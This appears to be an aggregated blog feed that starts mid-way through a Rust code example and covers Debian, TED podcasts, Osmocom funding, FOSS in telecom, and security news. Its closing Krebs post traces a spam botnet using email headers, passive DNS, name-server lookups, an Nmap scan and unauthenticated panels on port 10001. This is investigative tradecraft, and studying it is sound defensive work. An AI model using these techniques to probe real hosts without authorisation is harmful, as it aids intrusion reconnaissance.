            Ordering::Equal => format!("{}, {}", start, author),
            _ => format!("{}-{}, {}", start, end, author),
        };

        notices.push(cnotice);
    }

    Ok(notices)
}

Of course it is not as short as the shell (or probably Python) code, but that is fine: Rust is a systems programming language (intended to replace C/C++), and doing complex shell work (complex due to the need for pipelines) in approximately 50 lines of code, in a safe and secure way, is very much acceptable. Besides, the code is as readable as the plain shell snippet, thanks to the | operator implemented by the subprocess crate.

Debian Administration Debian Stretch Released

Today the Debian project is pleased to announce the release of the next stable release of Debian GNU/Linux, code-named Stretch.


Krebs on SecurityCredit Card Breach at Buckle Stores

The Buckle Inc., a clothier that operates more than 450 stores in 44 U.S. states, disclosed Friday that its retail locations were hit by malicious software designed to steal customer credit card data. The disclosure came hours after KrebsOnSecurity contacted the company regarding reports from sources in the financial sector about a possible breach at the retailer.

buckle

On Friday morning, KrebsOnSecurity contacted The Buckle after receiving multiple tips from sources in the financial industry about a pattern of fraud on customer credit and debit cards which suggested a breach of point-of-sale systems at Buckle stores across the country.

Later Friday evening, The Buckle Inc. released a statement saying that point-of-sale malware was indeed found installed on cash registers at Buckle retail stores, and that the company believes the malware was stealing customer credit card data between Oct. 28, 2016 and April 14, 2017. The Buckle said purchases made on its online store were not affected.

As with the recent POS-malware based breach at Kmart, The Buckle said all of its stores are equipped with EMV-capable card terminals, meaning the point-of-sale machines can accommodate newer, more secure chip-based credit and debit cards. The malware copies account data stored on the card’s magnetic stripe. Armed with that information, thieves can clone the cards and use them to buy high-priced merchandise from electronics stores and big box retailers.

The trouble is that not all banks have issued chip-enabled cards, which are far more expensive and difficult for thieves to counterfeit. Customers who shopped at compromised Buckle stores using a chip-based card would not be in danger of having their cards cloned and used elsewhere, but the stolen card data could still be used for e-commerce fraud.

Visa said in March 2017 there were more than 421 million Visa chip cards in the country, representing 58 percent of Visa cards. According to Visa, counterfeit fraud has been declining month over month — down 58 percent at chip-enabled merchants in December 2016 when compared to the previous year.

The United States is the last of the G20 nations to make the shift to chip-based cards. Visa has said it typically took about three years after the liability shifts in other countries before 90% of payment card transactions were “chip-on-chip,” or generated by a chip card used at a chip-based terminal.

Virtually every other country that has made the jump to chip-based cards saw fraud trends shifting from card-present to card-not-present (online, phone) fraud as it became more difficult for thieves to counterfeit physical credit cards. Data collected by consumer credit bureau Experian suggests that e-commerce fraud increased 33 percent last year over 2015.

TED5 TED Radio Hour episodes that explore what it’s like to be human

TED Radio Hour started in 2013, and while I’ve only been working on the show for about a year, it’s one of my favorite parts of my job. We work with an incredibly creative team over at NPR, and helping them weave different ideas into a narrative each week adds a whole new dimension to the talks.

On Friday, the podcast published its 100th episode. The theme is A Better You, and in the hour we explore the many ways we as humans try to improve ourselves. We look at the role of our own minds when it comes to self-improvement, and the tension in play between the internal and the external in this struggle.

New to the show, or looking to dip back into the archive? Below are five of my favorite episodes so far that explore what it means to be human.

The Hero’s Journey

What makes a hero? Why are we so drawn to stories of lone figures, battling against the odds? We talk about space and galaxies far, far away a lot at TED, but in this episode we went one step further and explored how the concept of the Hero’s Journey relates to the Star Wars universe – and the ideas of TED speakers. Dame Ellen MacArthur shares the transformative impact of her solo sailing trip around the world. Jarrett J. Krosoczka pays homage to the surprising figures that formed his path in life. George Takei tells his powerful story of being held in a Japanese-American internment camp during WWII, and how he managed to forgive, and even love, the country that treated him this way. We finish up the hour with Ismael Nazario’s story of spending 300 days in solitary confinement before he was even convicted of a crime, and how this ultimately set him on a journey to help others.

Anthropocene

In this episode, four speakers make the case that we are now living in a new geological age called the Anthropocene, where the main force impacting the earth – is us. Kenneth Lacovara opens the show by taking us on a tour of the earth’s ages so far. Next Emma Marris calls us to connect with nature in a new way so we’ll actually want to protect it. Then, Peter Ward looks at what past extinctions can tell us about the earth – and ourselves. Finally Cary Fowler takes us deep within a vault in Svalbard, where a group of scientists are storing seeds in an attempt to ultimately preserve our species. While the subject could easily be a ‘doom and gloom’ look at the state of our planet, ultimately it left me hopeful and optimistic for our ability to solve some of these monumental problems. If you haven’t yet heard of the Anthropocene, I promise that after this episode you’ll start coming across it everywhere.

The Power of Design

Doing an episode on design seemed like an obvious choice, and we were excited about the challenge of creating an episode about such a visual discipline for radio. We looked at the ways good or bad design affects us, and the ways we can make things more elegant and beautiful. Tony Fadell starts out the episode by bringing us back to basics, calling out the importance of noticing design flaws in the world around us in order to solve problems. Marc Kushner predicts how architectural design is going to be increasingly shaped by public perception and social media. Airbnb co-founder Joe Gebbia takes us inside the design process that helped people establish enough trust to open up their homes to complete strangers. Next we take an insightful design history lesson with Alice Rawsthorn to pay homage to bold and innovative design thinkers of the past, and their impact on the present. We often think of humans as having a monopoly on design, but our final speaker in this episode, Janine Benyus, examines the incredible design lessons we can take from the natural world.

Beyond Tolerance

We throw around the word ‘tolerance’ a lot – especially in the last year as politics has grown even more polarized. But how can we push past mere tolerance to true understanding and empathy? I remember when we first started talking about this episode Guy said he wanted it to be a deep dive into things you wouldn’t talk about at the dinner table, and we did just that: from race, to politics, to abortion, all the way to Israeli-Palestinian relations. Arthur Brooks tackles the question of how liberals and conservatives can work together – and why it’s so crucial. Diversity advocate Vernā Myers gives some powerful advice on how to conquer our unconscious biases. In the fraught and often painful debate around abortion, Aspen Baker emphasizes the need to listen: to be pro-voice, rather than pro-life or pro-choice. Finally Aziz Abu Sarah describes the tours he leads which bring Jews, Muslims and Christians across borders to break bread and forge new cultural ties.

Headspace

What I really love about this episode is that it takes a dense and difficult subject – mental health – and approaches it with this very human optimism, ultimately celebrating the resilience and power of our minds. The show opens up with Andrew Solomon, one of my favorite TED speakers, who shares what he has learned from his battle with depression, including how he forged meaning and identity from his experience with the illness. He has some fascinating and beautiful ideas around mental health and personality, which still resonate so strongly with me. Next, Alix Generous explains some of the misconceptions around Asperger’s Syndrome; she beautifully articulates the gap between her “complex inner life” and how she communicates with the world. David Anderson looks at the biology of emotion and how our brains function, painting a picture of how new research could revolutionize the way we understand and care for our mental health. Our fourth speaker, psychologist Guy Winch, gives some strong takeaways on how we can incorporate caring for our ‘emotional health’ in our daily lives.

Happy listening! To find out more about the show, follow us on Facebook and Twitter.



CryptogramFriday Squid Blogging: Squids from Space Video Game

An early preview.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramNSA Links WannaCry to North Korea

There's evidence:

Though the assessment is not conclusive, the preponderance of the evidence points to Pyongyang. It includes the range of computer Internet protocol addresses in China historically used by the RGB, and the assessment is consistent with intelligence gathered recently by other Western spy agencies. It states that the hackers behind WannaCry are also called "the Lazarus Group," a name used by private-sector researchers.

One of the agencies reported that a prototype of WannaCry ransomware was found this spring in a non-Western bank. That data point was a "building block" for the North Korea assessment, the individual said.

Honestly, I don't know what to think. I am skeptical, but I am willing to be convinced. (Here's the grugq, also trying to figure it out.) What I would like to see is the NSA evidence in more detail than they're probably comfortable releasing.

More commentary. Slashdot thread.

Sociological ImagesLonely Hearts: Estranged Fathers on Father’s Day

I work with one of the most heartbroken groups of people in the world: fathers whose adult children want nothing to do with them. While every day has its challenges, Father’s Day—with its parade of families and feel-good ads—makes it especially difficult for these Dads to avoid the feelings of shame, guilt and regret always lurking just beyond the reach of that well-practiced compartmentalization. Like birthdays, and other holidays, Father’s Day creates the wish, hope, or prayer that maybe today, please today, let me hear something, anything from my kid.

Many of these men are not only fathers but grandfathers who were once an intimate part of their grandchildren’s lives. Or, more tragically, they discovered they were grandfathers through a Facebook page, if they hadn’t yet been blocked. Or, they learn from an unwitting relative bearing excited congratulations, now surprised by the look of grief and shock that greets the newly announced grandfather. Hmm, what did I do with those cigars I put aside for this occasion?

And it’s not just being involved as a grandfather that gets denied. The estrangement may foreclose the opportunity to celebrate other developmental milestones he always assumed he’d attend, such as college graduations, engagement parties, or weddings. Maybe he was invited to the wedding but told he wouldn’t get to walk his daughter down the aisle because that privilege was being reserved for her father-in-law whom she’s decided is a much better father than he ever was.

Most people assume that a Dad would have to do something pretty terrible to make an adult child not want to have contact. My clinical experience working with estranged parents doesn’t bear this out. While those cases clearly exist, many parents get cut out as a result of the child needing to feel more independent and less enmeshed with the parent or parents. A not insignificant number of estrangements are influenced by a troubled or compelling son-in-law or daughter-in-law. Sometimes a parent’s divorce creates the opportunity for one parent to negatively influence the child against the other parent, or introduce people who compete for the parent’s love, attention or resources. In a highly individualistic culture such as ours, divorce may cause the child to view a parent more as an individual with relative strengths and weaknesses rather than a family unit of which they’re a part.

Little binds adult children to their parents today beyond whether or not the adult child wants that relationship. And a not insignificant number decide that they don’t.

While my clinical work hasn’t shown fathers to be more vulnerable to estrangement than mothers, they do seem to be more at risk of a lower level of investment from their adult children. A recent Pew survey found that women more commonly say their grown children turn to them for emotional support while men more commonly say this “hardly ever” or “never” occurs. This same study reported that half of adults say they are closer with their mothers, while only 15 percent say they are closer with their fathers.

So, yes, let’s take a moment to celebrate fathers everywhere. And another to feel empathy for those Dads who won’t have any contact with their child on Father’s Day.

Or any other day.

Josh Coleman is Co-Chair, Council on Contemporary Families, and author most recently of When Parents Hurt. Originally posted at Families as They Really Are.

(View original at https://thesocietypages.org/socimages)

CryptogramGaming Google News

Turns out that it's surprisingly easy to game:

It appears that news sites deemed legitimate by Google News are being modified by third parties. These sites are then exploited to redirect to the spam content. It appears that the compromised sites are examining the referrer and redirecting visitors coming from Google News.

Worse Than FailureError'd: @TitleOfErrord

"I asked my son, @Firstname, and he is indeed rather @Emotion about going to @ThemePark!" wrote Chris @LASTNAME.

 

"I think Google assumes there is only one exit on the highway," writes Balaprasanna S.

 

Axel C. writes, "So what you're saying here is that something went wrong?"

 

"Hmmmm...YMMV, but that's not quite the company that I would want to follow," wrote Rob H.

 

"You know, I also confuse San Francisco with San Jose all the time. I mean, they just sound so much alike!" writes Mike S.

 

Mike G. writes, "Sure, it's a little avant garde, but I hear this film was nominated for an award."

 



Harald WelteHow the Osmocom GSM stack is funded

As the topic has been raised on twitter, I thought I might share a bit of insight into the funding of the Osmocom Cellular Infrastructure Projects.

Keep in mind: Osmocom is a much larger umbrella project, and beyond the network-side cellular stack it is home to many different community-based projects around open source mobile communications. All of those started more or less as just-for-fun projects, nothing serious, just a hobby [1].

The projects implementing the network-side protocol stacks and network elements of GSM/GPRS/EGPRS/UMTS cellular networks are somewhat the exception to that, as they have to some extent become professionalized. We call those projects collectively the Cellular Infrastructure projects inside Osmocom. This post is about that part of Osmocom only.

History

From late 2008 through 2009, People like Holger and I were working on bs11-abis and later OpenBSC only in our spare time. The name Osmocom didn't even exist back then. There was a strong technical community with contributions from Sylvain Munaut, Andreas Eversberg, Daniel Willmann, Jan Luebbe and a few others. None of this would have been possible if it wasn't for all the help we got from Dieter Spaar with the BS-11 [2]. We all had our dayjob in other places, and OpenBSC work was really just a hobby. People were working on it, because it was where no FOSS hacker has gone before. It was cool. It was a big and pleasant challenge to enter the closed telecom space as pure autodidacts.

Holger and I were doing freelance contract development work on Open Source projects for many years before. I was mostly doing Linux related contracting, while Holger has been active in all kinds of areas throughout the FOSS software stack.

In 2010, Holger and I saw some first interest by companies into OpenBSC, including Netzing AG and On-Waves ehf. So we were able to spend at least some of our paid time on OpenBSC/Osmocom related contract work, and were thus able to do less other work. We also continued to spend tons of spare time in bringing Osmocom forward. Also, the amount of contract work we did was only a fraction of the many more hours of spare time.

In 2011, Holger and I decided to start the company sysmocom in order to generate more funding for the Osmocom GSM projects by means of financing software development by product sales. So rather than doing freelance work for companies who bought their BTS hardware from other places (and spent huge amounts of cash on that), we decided that we wanted to be a full solution supplier, who can offer a complete product based on all hardware and software required to run small GSM networks.

The only problem is: We still needed an actual BTS for that. Through some reverse engineering of existing products we figured out who one of the ODM suppliers for the hardware + PHY layer was, and decided to develop the OsmoBTS software to run on that hardware. We inherited some of the early code from work done by Andreas Eversberg on the jolly/bts branch of OsmocomBB (thanks), but much was missing at the time.

What followed was Holger and me working for several years for free [3], without any salary, in order to complete the OsmoBTS software, build an embedded Linux distribution around it based on OE/poky, write documentation, etc., and complete the first sysmocom product: the sysmoBTS 1002.

We did that not because we want to get rich, or because we want to run a business. We did it simply because we saw an opportunity to generate funding for the Osmocom projects and make them more sustainable and successful. And because we believe there is a big, gaping, huge vacuum in terms of absence of FOSS in the cellular telecom sphere.

Funding by means of sysmocom product sales

Once we started to sell the sysmoBTS products, we were able to fund Osmocom related development from the profits made on hardware / full-system product sales. Every single unit sold made a big contribution towards funding both the maintenance as well as the ongoing development on new features.

This source of funding continues to be an important factor today.

Funding by means of R&D contracts

Probably the best and most welcome method of funding Osmocom-related work is R&D projects, in which a customer funds our work to extend the Osmocom GSM stack in one particular area where they have a need that the existing code cannot yet fulfill.

This kind of project is the ideal match, as it shows where the true strength of FOSS is: Each of those customers did not have to fund the development of a GSM stack from scratch. Rather, they only had to fund those bits that were missing for their particular application.

Our reference for this is and has been On-Waves, who have been funding development of their required features (and bug fixing etc.) since 2010.

We've of course had many other projects from a variety of customers over the years. Last, but not least, we had a customer who willingly co-funded (together with funds from NLnet foundation and lots of unpaid effort by sysmocom) the 3G/3.5G support in the Osmocom stack.

The problem here is:

  • we have not been able to secure anywhere near as many of those R&D projects within the cellular industry as we had hoped, despite believing we have a very good foundation upon which we can build. I've been writing many exciting technical project proposals.
  • you almost exclusively get funding only for new features. But it's very hard to get funding for the core maintenance work: the bug fixing, code review, code refactoring, testing, etc.

So as a result, the profit margin on R&D projects is basically used to fund (however inadequately) those bits and pieces that nobody wants to pay for.

Funding by means of customer support

There is a way to generate funding for development by providing support services. We've had some success with this, but primarily alongside the actual hardware/system sales - not so much in terms of pure software-only support.

Also, providing support services from a R&D company means:

  • either you distract your developers by handling support inquiries. This means they will have less time to work on actual code, and likely get sidetracked by too many issues that make it hard to focus
  • or you have to hire separate support staff. This of course means that the size of the support business has to be sufficiently large to not only cover the costs of hiring + training support staff, but also still generate funding for the actual software R&D.

We tried the second option briefly, but have fallen back to the first for now. There's simply not enough user/admin-type support business to justify dedicated staff for that.

Funding by means of cross-subsidizing from other business areas

sysmocom also started to do some non-Osmocom projects in order to generate revenue that we can feed again into Osmocom projects. I'm not at liberty to discuss them in detail, but basically we've been doing pretty much anything from

  • custom embedded Linux board designs
  • M2M devices with GSM modems
  • consulting gigs
  • public tendered research projects

Profits from all those areas went again into Osmocom development.

Last, but not least, we also operate the sysmocom webshop. The profit we make on those products also is again immediately re-invested into Osmocom development.

Funding by grants

We've had some success in securing funding from the NLnet Foundation for specific features. While this is useful, the size of their project grants (up to EUR 30k) is not a good fit for the scale of the tasks we have at hand inside Osmocom. You may think that's a considerable amount of money. Well, it translates to 2-3 man-months of work at a bare cost-covering rate. At a team size of 6 developers, you would theoretically have churned through that in two weeks. Also, their focus is (understandably) on Internet and IT security, and not so much on cellular communications.

There are of course other options for grants, such as government research grants and the like. However, they require long-term planning, they require you to match (i.e. pay yourself) a significant portion, and basically mandate that you hire one extra person for doing all the required paperwork and reporting. So all in all, not a particularly attractive option for a very small company consisting of die hard engineers.

Funding by more BTS ports

At sysmocom, we've been doing some ports of the OsmoBTS + OsmoPCU software to other hardware, and supporting those other BTS vendors with porting, R&D and support services.

If sysmocom was a classic BTS vendor, we would not help our "competition". However, we are not. sysmocom exists to help Osmocom, and we strongly believe in open systems and architectures, without a single point of failure, a single supplier for any component or any type of vendor lock-in.

So we happily help third parties to get Osmocom running on their hardware, either with a proprietary PHY or with OsmoTRX.

However, we expect that those BTS vendors also understand their responsibility to share the development and maintenance effort of the stack. Preferably by dedicating some of their own staff to work in the Osmocom community. Alternatively, sysmocom can perform that work as paid service. But that's a double-edged sword: We don't want to be a single point of failure.

Osmocom funding outside of sysmocom

Osmocom is of course more than sysmocom. This holds even for the cellular infrastructure projects inside Osmocom: They are true, community-based, open, collaborative development projects. Anyone can contribute.

Over the years, there have been code contributions by e.g. Fairwaves. They, too, build GSM base station hardware and use that as a means to not only recover the R&D on the hardware, but also to contribute to Osmocom. At some point a few years ago, there was a lot of work from them in the area of OsmoTRX, OsmoBTS and OsmoPCU. Unfortunately, in more recent years, they have not been able to keep up the level of contributions.

There are other companies engaged in activities with and around Osmocom. There's Rhizomatica, an NGO helping indigenous communities to run their own cellular networks. They have been funding some of our efforts, but being an NGO helping rural regions in developing countries, they of course also don't have the deep pockets. Ideally, we'd want to be the ones contributing to them, not the other way around.

State of funding

In recent years, we've been making some progress in securing funding from players we cannot name [4]. We're also making occasional progress in convincing BTS suppliers to chip in their share. Unfortunately, there are more who don't live up to their responsibility than those who do. I might start calling them out by name one day. The wider community and the public actually deserve to know who plays by FOSS rules and who doesn't. That's not shaming, it's just stating bare facts.

Which brings us to:

  • sysmocom is in an office that's actually too small for the team, equipment and stock. But we certainly cannot afford more space.
  • we cannot pay our employees what they could earn working at similar positions in other companies. So working at sysmocom requires dedication to the cause :)
  • Holger and I have invested way more time than we have ever paid ourselves for, even more so considering the opportunity cost of what we would have earned if we'd continued our freelance Open Source hacker path
  • we're [just barely] managing to pay for 6 developers dedicated to Osmocom development on our payroll based on the various funding sources indicated above

Nevertheless, I doubt that any team this small has ever implemented an end-to-end GSM/GPRS/EGPRS network from RAN to Core at a comparable feature set. My deepest respect to everyone involved. The big task now is to make it sustainable.

Summary

So as you can see, there's quite a bit of funding around. However, it always falls short of what's needed to implement all parts properly, and is not even quite sufficient to keep maintaining the status quo in a proper and tested way. That can often be frustrating (mostly to us, but sometimes also to users who run into regressions and other bugs). There's so much more potential. So many things we have wanted to add or clean up for a long time, but too few people interested in joining in and helping out - financially or by writing code.

One thing that is often a challenge when dealing with traditional customers: We are not developing a product and then selling it ready-made. In fact, in FOSS this would be more or less suicidal: We'd have to invest man-years upfront, but then once it is finished, everyone could use it without having to partake in that investment.

So instead, the FOSS model requires the customers/users to chip in early during the R&D phase, in order to then subsequently harvest the fruits of that.

I think the lack of a FOSS mindset across the cellular / telecom industry is the biggest constraining factor here. I saw the same thing some 15 to 20 years ago in the Linux world. Trust me, it takes a lot of dedication to the cause to endure this lack of comprehension so many years later.

[1]just like Linux started out.
[2]while you will not find a lot of commits from Dieter in the code, he has been playing a key role in doing a lot of prototyping, reverse engineering and debugging!
[3]sysmocom is 100% privately held by Holger and me, we intentionally have no external investors and are proud to never had to take a bank loan. So all we could invest was our own money and, most of all, time.
[4]contrary to the FOSS world, a lot of aspects are confidential in business, and we're not at liberty to disclose the identities of all our customers

Harald WelteFOSS misconceptions, still in 2017

The lack of basic FOSS understanding in Telecom

Given that the Free and Open Source movement has been around at least since the 1980s, it puzzles me that people still seem to have such fundamental misconceptions about it.

Something that really triggered me was an article at LightReading [1], which quotes Ulf Ewaldsson, a leading Ericsson executive, with:

"I have yet to understand why we would open source something we think is really good software"

This completely misses the point. FOSS is not about making a charity donation of a finished product to the planet.

FOSS is about sharing the development costs among multiple players, and avoiding everyone having to reinvent the wheel. Macro-economically, it is complete and utter nonsense that each 3GPP specification gets implemented dozens of times, by at least a dozen different entities. As a result, products are way more expensive than they need to be.

If large Telco players (whether operators or equipment manufacturers) were to collaboratively develop code just as much as they collaboratively develop the protocol specifications, there would be no need for replicating all of this work.

As a result, everyone could produce cellular network elements at reduced cost, sharing the R&D expenses, and competing in key areas, such as who can come up with the most energy-efficient implementation, or can produce the most reliable hardware, the best receiver sensitivity, the best and most fair scheduling implementation, or whatever else. But some 80% of the code could probably be shared, as e.g. encoding and decoding messages according to a given publicly released 3GPP specification document is not where those equipment suppliers actually compete.
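The cost-sharing argument can be made concrete with a back-of-the-envelope calculation. All numbers below are illustrative assumptions, loosely based on the "dozen entities" and "80% shared code" figures above, not real industry figures:

```rust
fn main() {
    // Illustrative assumptions: a dozen vendors each implement the same
    // 3GPP stack; ~80% of that code is non-differentiating and could be
    // developed once, collaboratively.
    let vendors: f64 = 12.0;
    let cost_per_stack: f64 = 1.0; // normalized R&D cost of one full implementation
    let shared_fraction: f64 = 0.8;

    // Status quo: every vendor pays the full cost of its own stack.
    let status_quo = vendors * cost_per_stack;

    // Collaborative: the shared 80% is written once; each vendor only
    // funds its own differentiating 20%.
    let collaborative = shared_fraction * cost_per_stack
        + vendors * (1.0 - shared_fraction) * cost_per_stack;

    println!("status quo: {:.1}, collaborative: {:.1}", status_quo, collaborative);
}
```

Under these assumptions the industry-wide spend drops from 12 normalized units to roughly 3.2, while each vendor still fully owns the 20% it actually competes on.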

So my dear cellular operator executives: Next time you're cursing about the prohibitively expensive pricing that your equipment suppliers quote you: You only have to pay that much because everyone is reinventing the wheel over and over again.

Equally, my dear cellular infrastructure suppliers: You are all dying one by one, as it's hard to develop everything from scratch. Over the years, many of you have died. One wonders if we might still have more players left had some of you started to cooperate in developing FOSS, at least in those areas where you're not competing. You could replicate what Linux is doing in the operating system market. There's no need for a phalanx of different proprietary flavors of Unix-like OSs. It's way too expensive, and it's not an area in which most companies need to or want to compete anyway.

Management Summary

You don't first develop an entire product until it is finished and then release it as open source. This makes little economic sense in a lot of cases, as you've already invested in developing 100% of it. Instead, you develop a new product collaboratively as FOSS in order to invest not 100% but maybe only 30% or even less. You get a multiple of your R&D investment back, because you're not only getting your own code, but all the other code that other community members implemented. You of course also get other benefits, such as peer review of the code, more ideas (not all bright people work inside one given company), etc.

[1]that article is actually a heavily opinionated post by somebody who appears to have been pushing his own anti-FOSS agenda for some time. The author is misinformed about the fact that the TIP has always included projects under both FRAND and FOSS terms. As a TIP member I can attest to that fact. I'm only referencing it here for the sake of that Ericsson quote.

Krebs on SecurityInside a Porn-Pimping Spam Botnet

For several months I’ve been poking at a decent-sized spam botnet that appears to be used mainly for promoting adult dating sites. Having hit a wall in my research, I decided it might be good to publish what I’ve unearthed so far to see if this dovetails with any other research out there.

In late October 2016, an anonymous source shared with KrebsOnSecurity.com a list of nearly 100 URLs that — when loaded into a Firefox browser — each displayed what appeared to be a crude but otherwise effective text-based panel designed to report in real time how many “bots” were reporting in for duty.

Here’s a set of archived screenshots of those counters illustrating how these various botnet controllers keep a running tab of how many “activebots” — hacked servers set up to relay spam — are sitting idly by and waiting for instructions.

One of the more than 100 panels linked to the same porn spamming operation. In October 2016, these 100 panels reported a total of 1.2 million active bots operating simultaneously.

At the time, it was unclear to me how this apparent botnet was being used, and since then the total number of bots reporting in each day has shrunk considerably. During the week the above-linked screen shots were taken, this botnet had more than 1.2 million zombie machines or servers reporting each day (that screen shot archive includes roughly half of the panels found). These days, the total number of servers reporting in to this spam network fluctuates between 50,000 and 100,000.

Thanks to a tip from an anti-spam activist who asked not to be named, I was able to see that the botnet appears to be busy promoting a seemingly endless network of adult dating Web sites connected to just two companies: CyberErotica, and Deniro Marketing LLC (a.k.a. AmateurMatch).

As affiliate marketing programs go, CyberErotica stretches way back — perhaps to the beginning. According to TechCrunch, CyberErotica is said to have launched the first online affiliate marketing firm in 1994.

In 2001, CyberErotica’s parent firm Voice Media settled a lawsuit with the U.S. Federal Trade Commission, which alleged that the adult affiliate program was misrepresenting its service as free while it dinged subscribers for monthly charges and made it difficult for them to cancel.

In 2010, Deniro Marketing found itself the subject of a class-action lawsuit that alleged the company employed spammers to promote an online dating service that was overrun with automated, fake profiles of young women. Those allegations ended in an undisclosed settlement after the judge in the case tossed out the spamming claim because the statute of limitations on those charges had expired.

What’s unusual (and somewhat lame) about this botnet is that — through a variety of botnet reporting panels that are still displaying data — we can get live, real-time updates about the size and status of this crime machine. No authentication or credentials needed. So much for operational security!

The “mind map” pictured below contains enough information for nearly anyone to duplicate this research, and includes the full Web address of the botnet reporting panels that are currently online and responding with live updates. I was unable to load these panels in a Google Chrome browser (perhaps the XML data on the page is missing some key components), but they loaded fine in Mozilla Firefox.

But a note of caution: I’d strongly encourage anyone interested in following my research to take care before visiting these panels, preferably doing so from a disposable “virtual” machine that runs something other than Microsoft Windows.

That’s because spammers are usually involved in the distribution of malicious software, and spammers who maintain vast networks of apparently compromised systems are almost always involved in creating or at least commissioning the creation of said malware. Worse, porn spammers are some of the lowest of the low, so it’s only prudent to behave as if any and all of their online assets are actively hostile or malicious.

A “mind map” tracing some of the research mentioned in this post.

FOLLOW THE HONEY

So how did KrebsOnSecurity tie the spam that was sent to promote these two adult dating schemes to the network of spam botnet panels that I mentioned at the outset of this post? I should say it helped immensely that one anti-spam source maintains a comprehensive, historic collection of spam samples, and that this source shared more than a half dozen related spam samples. Here’s one of them.

All of those spams had similar information included in their “headers” — the metadata that accompanies all email messages.

Received: from minitanth.info-88.top (037008194168.suwalki.vectranet.pl [37.8.194.168])
Received: from exundancyc.megabulkmessage225.com (109241011223.slupsk.vectranet.pl [109.241.11.223])
Received: from disfrockinga.message-49.top (unknown [78.88.215.251])
Received: from offenders.megabulkmessage223.com (088156021226.olsztyn.vectranet.pl [88.156.21.226])
Received: from snaileaterl.inboxmsg-228.top (109241018033.lask.vectranet.pl [109.241.18.33])
Received: from soapberryl.inboxmsg-242.top (037008209142.suwalki.vectranet.pl [37.8.209.142])
Received: from dicrostonyxc.inboxmsg-230.top (088156042129.olsztyn.vectranet.pl [88.156.42.129])

To learn more about what information you can glean from email headers, see this post. But for now, here’s a crash course for our purposes. The so-called “fully qualified domain names” or FQDNs in the list above can be found just to the right of the open parentheses in each line.

When this information is present in the headers (and not simply listed as “unknown”) it is the fully-verified, real name of the machine that sent the message (at least as far as the domain name system is concerned). The dotted address to the right in brackets on each line is the numeric Internet address of the actual machine that sent the message.

The information to the left of the open parentheses is called the “HELO/EHLO string,” and an email server administrator can set this information to display whatever he wants: It could be set to bush[dot]whitehouse[dot]gov. Happily, in this case the spammer seems to have been consistent in the naming convention used to identify the sending domains and subdomains.
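As a rough illustration of that crash course, the HELO string, the verified name, and the sending IP can be pulled out of header lines formatted exactly like the ones above with a simple regular expression. This parsing pattern is my own sketch, not part of any spam tool:

```python
import re

# One "Received:" line looks like: from HELO (verified-fqdn [ip.ad.dr.ess])
RECEIVED_RE = re.compile(
    r"Received: from (?P<helo>\S+) \((?P<fqdn>\S+) \[(?P<ip>[0-9.]+)\]\)"
)

def parse_received(line):
    """Return (HELO string, verified FQDN, sending IP), or None if unparseable.

    Note the FQDN field may literally read "unknown" when reverse DNS failed.
    """
    m = RECEIVED_RE.match(line)
    return (m.group("helo"), m.group("fqdn"), m.group("ip")) if m else None

line = ("Received: from minitanth.info-88.top "
        "(037008194168.suwalki.vectranet.pl [37.8.194.168])")
print(parse_received(line))
# → ('minitanth.info-88.top', '037008194168.suwalki.vectranet.pl', '37.8.194.168')
```

Run against the seven header lines above, this separates the spammer-controlled HELO names from the verified Polish broadband hosts doing the relaying.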

Back in October 2016 (when these spam messages were sent) the FQDN “minitanth.info-88[dot]top” resolved to a specific IP address: 37.8.194.168. Using passive DNS tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses — I was able to find that the spammer who set up the domain info-88[dot]top had associated the domain with hundreds of third-level subdomains (e.g. minitanth.info-88[dot]top, achoretsq.info-88[dot]top, etc.).

It was also clear that this spammer controlled a great many top-level domain names, and that he had countless third-level subdomains assigned to every domain name. This type of spamming is known as “snowshoe” spamming.

“Like a snowshoe spreads the load of a traveler across a wide area of snow, snowshoe spamming is a technique used by spammers to spread spam output across many IPs and domains, in order to dilute reputation metrics and evade filters,” writes anti-spam group Spamhaus in its useful spam glossary.
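The snowshoe pattern jumps out as soon as the sender names are grouped under their registered domains. Here is a minimal sketch of that grouping; it naively takes the last two labels as the apex (a real tool would consult the Public Suffix List), and the sample names come from the headers above:

```python
from collections import defaultdict

def group_by_apex(fqdns):
    """Bucket fully qualified names under their apex (registered) domain."""
    groups = defaultdict(set)
    for name in fqdns:
        labels = name.rstrip(".").split(".")
        # Naive apex: last two labels (no Public Suffix List handling).
        groups[".".join(labels[-2:])].add(name)
    return dict(groups)

senders = ["minitanth.info-88.top", "achoretsq.info-88.top",
           "offenders.megabulkmessage223.com"]
groups = group_by_apex(senders)
print(sorted(groups))              # → ['info-88.top', 'megabulkmessage223.com']
print(len(groups["info-88.top"]))  # → 2
```

With hundreds of apex domains each carrying countless throwaway subdomains, the distribution itself is the fingerprint of a snowshoe operation.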

WORKING BACKWARDS

So, armed with all of that information, it took just one or two short steps to locate the IP addresses of the corresponding botnet reporting panels. Quite simply, one does DNS lookups to find the names of the name servers that were providing DNS service for each of this spammer’s second-level domains.

Once one has all of the name server names, one simply does yet more DNS lookups — one for each of the name server names — in order to get the corresponding IP address for each one.
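Those two rounds of lookups are mechanical enough to script. The sketch below keeps the actual DNS client pluggable — pass in wrappers around dnspython or `dig`, or, as here, stub dictionaries with made-up addresses — since the point is just the NS-then-A chain:

```python
def panel_candidates(domains, lookup_ns, lookup_a):
    """For each domain, resolve its name servers (NS records), then resolve
    each name server's IPv4 addresses (A records).

    Returns the de-duplicated, sorted list of candidate panel IPs.
    lookup_ns(domain) -> list of name-server hostnames
    lookup_a(host)    -> list of IPv4 address strings
    """
    ips = set()
    for domain in domains:
        for ns in lookup_ns(domain):
            ips.update(lookup_a(ns))
    return sorted(ips)

# Stub resolvers with illustrative data (not real DNS records):
NS = {"info-88.top": ["ns1.info-88.top", "ns2.info-88.top"]}
A = {"ns1.info-88.top": ["198.51.100.10"], "ns2.info-88.top": ["198.51.100.11"]}

print(panel_candidates(["info-88.top"],
                       lambda d: NS.get(d, []),
                       lambda h: A.get(h, [])))
# → ['198.51.100.10', '198.51.100.11']
```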

With that list of IP addresses in hand, a trusted source volunteered to perform a series of scans on the addresses using “Nmap,” a powerful and free tool that can map out any individual virtual doorways or “ports” that are open on targeted systems. In this case, an Nmap scan against that list of IPs showed they were all listening for incoming connections on Port 10001.

From there, I took the IP address list and plugged each address individually into the URL field of a browser window in Mozilla Firefox, and then added “:10001” to the end of the address. After that, each address happily loaded a Web page displaying the number of bots connecting to each IP address at any given time.
